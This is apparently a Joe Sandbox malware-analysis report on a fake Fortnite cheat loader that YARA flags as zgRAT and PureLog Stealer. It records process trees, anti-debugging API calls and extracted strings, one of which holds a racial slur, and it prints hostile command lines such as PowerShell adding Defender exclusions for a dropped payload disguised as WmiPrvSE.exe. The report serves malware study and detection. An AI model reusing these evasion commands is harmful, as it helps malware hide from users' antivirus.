Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:19:31
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:19:31
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP"
Imagebase:	0x7ff617920000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:19:31
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline"
Imagebase:	0x7ff67ed10000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:19:32
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:19:32
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9270.tmp" "c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP"
Imagebase:	0x7ff617920000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:19:32
Start date:	30/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe'
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:19:32
Start date:	30/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:19:32
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:19:32
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:19:33
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat"
Imagebase:	0x7ff6aade0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:19:33
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:19:34
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff65a800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	12:19:34
Start date:	30/09/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff778970000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	12:19:34
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	C:\Edge\msedge.exe
Imagebase:	0xbc0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	12:19:34
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	C:\Edge\msedge.exe
Imagebase:	0x530000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	12:19:37
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	12:19:43
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\WmiPrvSE.exe"
Imagebase:	0x750000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\WmiPrvSE.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	12:19:45
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xPfNd2AH1w.bat"
Imagebase:	0x7ff6aade0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	12:19:46
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	12:19:46
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff65a800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	12:19:46
Start date:	30/09/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff778970000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	12:19:51
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	12:19:54
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Edge\msedge.exe"
Imagebase:	0xe70000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	12:19:57
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat" "
Imagebase:	0x7ff6aade0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	12:19:57
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	12:19:57
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff65a800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	12:19:57
Start date:	30/09/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff778970000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	12:19:59
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\WmiPrvSE.exe"
Imagebase:	0xbb0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	12:20:05
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Jcydu7dUmM.bat" "
Imagebase:	0x7ff6aade0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	12:20:05
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	12:20:05
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff65a800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	52.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	6

Executed Functions

Function 00007FF786623ED0 Relevance: 226.3, APIs: 76, Strings: 51, Instructions: 4049processwindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786614760: GetModuleHandleA.KERNEL32 ref: 00007FF78661478C
Part of subcall function 00007FF786614760: GetProcAddress.KERNEL32 ref: 00007FF78661479C
Part of subcall function 00007FF786614760: VirtualProtect.KERNELBASE ref: 00007FF7866147B8
Part of subcall function 00007FF786614760: VirtualProtect.KERNELBASE ref: 00007FF7866147D9
Part of subcall function 00007FF786614760: LoadLibraryA.KERNEL32 ref: 00007FF7866147EB
Part of subcall function 00007FF786614760: GetProcAddress.KERNEL32 ref: 00007FF7866147FB
Part of subcall function 00007FF786614760: GetCurrentThread.KERNEL32 ref: 00007FF786614809
Part of subcall function 00007FF786614760: NtSetInformationThread.NTDLL ref: 00007FF78661481D
Part of subcall function 00007FF786614760: QueryPerformanceFrequency.KERNEL32 ref: 00007FF786614824
Part of subcall function 00007FF786614760: QueryPerformanceCounter.KERNEL32 ref: 00007FF78661482F
Part of subcall function 00007FF786614760: QueryPerformanceCounter.KERNEL32 ref: 00007FF78661485A

Part of subcall function 00007FF786614220: ?_Random_device@std@@YAIXZ.MSVCP140 ref: 00007FF78661423F

Part of subcall function 00007FF786614BD0: IsDebuggerPresent.KERNEL32 ref: 00007FF786614BFF

Part of subcall function 00007FF786614BD0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786614E7F
Part of subcall function 00007FF786614BD0: exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786614E8A
Part of subcall function 00007FF786614BD0: GetCurrentProcess.KERNEL32 ref: 00007FF786614E97
Part of subcall function 00007FF786614BD0: CheckRemoteDebuggerPresent.KERNELBASE ref: 00007FF786614EA5

CreateThread.KERNELBASE ref: 00007FF786623FF1
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786624359
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786624729
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786624AF9
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786624B58
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786624B88
CreateFileW.KERNEL32 ref: 00007FF786624BB5
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786624ED9
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866251B7
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786625457
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786625767
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786625A87
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786625C24
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786625DB4
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786625F34
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866260B4
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786626234
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866263B4
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786626564
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786626704
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866268A4
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786626A34
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786626BC4
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786626D40
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786626EC6
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786627054
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866270E0
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786627139
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786627209
Sleep.KERNEL32 ref: 00007FF786627227
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866272B3
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786627309
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786627504
CreateFileW.KERNEL32 ref: 00007FF786627531
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786627849
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786627959
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786627CB9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786627CFB
MessageBoxA.USER32 ref: 00007FF78662809D
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866280AA
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7866280B7
Process32First.KERNEL32 ref: 00007FF7866280D4
lstrcmpiA.KERNEL32 ref: 00007FF7866280EE
Process32Next.KERNEL32 ref: 00007FF786628106
CloseHandle.KERNEL32 ref: 00007FF786628113
DeviceIoControl.KERNEL32 ref: 00007FF786628168
MessageBoxA.USER32 ref: 00007FF786628195
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662819D
CloseHandle.KERNEL32 ref: 00007FF7866281A4
_beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786628215
_Thrd_detach.MSVCP140 ref: 00007FF786628248
_beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866282C5
_Thrd_detach.MSVCP140 ref: 00007FF7866282F8
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF78662832E
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF78662833E
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF786628361
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786628371
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF786628394
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866283A4
LoadIconA.USER32 ref: 00007FF7866283CC
LoadCursorA.USER32 ref: 00007FF7866283E0
LoadIconA.USER32 ref: 00007FF78662840D
GetDesktopWindow.USER32 ref: 00007FF78662841A
GetWindowRect.USER32 ref: 00007FF786628427
RegisterClassExA.USER32 ref: 00007FF786628431
CreateWindowExA.USER32 ref: 00007FF78662847D
SetWindowLongA.USER32 ref: 00007FF786628498
DwmExtendFrameIntoClientArea.DWMAPI ref: 00007FF7866284BC
ShowWindow.USER32 ref: 00007FF7866284CE
SetWindowPos.USER32 ref: 00007FF7866284FA
SetLayeredWindowAttributes.USER32 ref: 00007FF786628512
UpdateWindow.USER32 ref: 00007FF78662851F
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF78662859E
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF7866285B1
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF7866285BD
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF7866285D0

Strings

Load Dependencies (Close Game First), xrefs: 00007FF786624301
sHM, xrefs: 00007FF786626B90
[UI;, xrefs: 00007FF78662705A, 00007FF786627144, 00007FF78662722D, 00007FF786627897
sHM, xrefs: 00007FF786625D80
sHM, xrefs: 00007FF7866266D0
sHM, xrefs: 00007FF786626870
Fortnite, xrefs: 00007FF7866283F8
sHM, xrefs: 00007FF786626080
sHM, xrefs: 00007FF786627020
sHM, xrefs: 00007FF786625BF0
sHM, xrefs: 00007FF786625730
sHM, xrefs: 00007FF786624E20
f7/7\, xrefs: 00007FF786626EE2
Driver Error Contact Support., xrefs: 00007FF78662720F, 00007FF786627549
sHM, xrefs: 00007FF7866242B0
sHM, xrefs: 00007FF786627C10
sHM, xrefs: 00007FF7866274D0
6,6[, xrefs: 00007FF7866260D0
The driver could not get the base address..., xrefs: 00007FF78662818E
Driver Found, xrefs: 00007FF786624E6F, 00007FF7866277EF
v'?'L, xrefs: 00007FF786624F38
sHM, xrefs: 00007FF786624670
sHM, xrefs: 00007FF786626A00
sHM, xrefs: 00007FF786624A40
UIQ>, xrefs: 00007FF78662673E
cr3 -> , xrefs: 00007FF786628377
sHM, xrefs: 00007FF786625180
WinVer, xrefs: 00007FF786628471
6,6[, xrefs: 00007FF786625F50
Waiting For Fortnite, xrefs: 00007FF786627C5F
sHM, xrefs: 00007FF7866277A0
hw$> M, xrefs: 00007FF7866251CB
sHM, xrefs: 00007FF786625F00
sHM, xrefs: 00007FF786626530
sHM, xrefs: 00007FF786626200
VAText -> , xrefs: 00007FF786628344
f7/7\, xrefs: 00007FF786625C40
6,6[, xrefs: 00007FF786625DD0
Base Address -> , xrefs: 00007FF786628311
sHM, xrefs: 00007FF786625420
cls, xrefs: 00007FF786624B81, 00007FF7866280A3
6,6[, xrefs: 00007FF786626250
sHM, xrefs: 00007FF786626380
\\.\orqur-ontop-fucking-nigger, xrefs: 00007FF786624BAE, 00007FF78662752A
FortniteClient-Win64-Shipping.exe, xrefs: 00007FF7866280E0
sHM, xrefs: 00007FF786626D10
sHM, xrefs: 00007FF786627EE0
Your choice: , xrefs: 00007FF786624A91
sHM, xrefs: 00007FF786625A50
sHM, xrefs: 00007FF786628060
Inject Orqur, xrefs: 00007FF7866246C1

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: system$V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@$V01@@$Window$Create$Cpp_error@std@@LoadThrow_$HandlePerformanceQueryThreadV01@_$AddressCloseCounterCurrentDebuggerFileIconMessagePresentProcProcess32ProtectThrd_detachVirtual_beginthreadexexit$??5?$basic_istream@AreaAttributesCheckClassClientControlCursorDesktopDeviceExtendFirstFrameFrequencyInformationIntoLayeredLibraryLongModuleNextProcessRandom_device@std@@RectRegisterRemoteShowSleepSnapshotToolhelp32Update_invalid_parameter_noinfo_noreturnlstrcmpi
String ID: Driver Found$ Inject Orqur$ Load Dependencies (Close Game First)$ Waiting For Fortnite$ Your choice: $6,6[$6,6[$6,6[$6,6[$Base Address -> $Driver Error Contact Support.$Fortnite$FortniteClient-Win64-Shipping.exe$The driver could not get the base address...$UIQ>$VAText -> $WinVer$[UI;$\\.\orqur-ontop-fucking-nigger$cls$cr3 -> $f7/7\$f7/7\$hw$> M$v'?'L$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM
API String ID: 2614544011-3220192735
Opcode ID: 6221c370354a4d45d05c76f599be0a37c5506b622c0e105901d2dc2840186566
Instruction ID: 3fb57f88a9fee9709e7e616bf57ddb425801c003b75107250819bf5ea7ac89e5
Opcode Fuzzy Hash: 6221c370354a4d45d05c76f599be0a37c5506b622c0e105901d2dc2840186566
Instruction Fuzzy Hash: 9E831726E29BC24AF703AB3598031A5E315AFB72C4FA1D733F91471957EF29B1C28614

Function 00007FF786614BD0 Relevance: 138.2, APIs: 63, Strings: 15, Instructions: 1722threadlibrarymemoryCOMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00007FF786614BFF
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786614E7F
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786614E8A
GetCurrentProcess.KERNEL32 ref: 00007FF786614E97
CheckRemoteDebuggerPresent.KERNELBASE ref: 00007FF786614EA5
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF78661513F
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661514A
LoadLibraryA.KERNEL32 ref: 00007FF786615160
GetProcAddress.KERNEL32 ref: 00007FF786615170
GetCurrentProcess.KERNEL32 ref: 00007FF786615179
NtQueryInformationProcess.NTDLL ref: 00007FF786615194
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF78661542F
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661543A
memset.VCRUNTIME140 ref: 00007FF78661544E
GetCurrentThread.KERNEL32 ref: 00007FF78661545A
GetThreadContext.KERNEL32 ref: 00007FF786615468
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786615632
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661563D
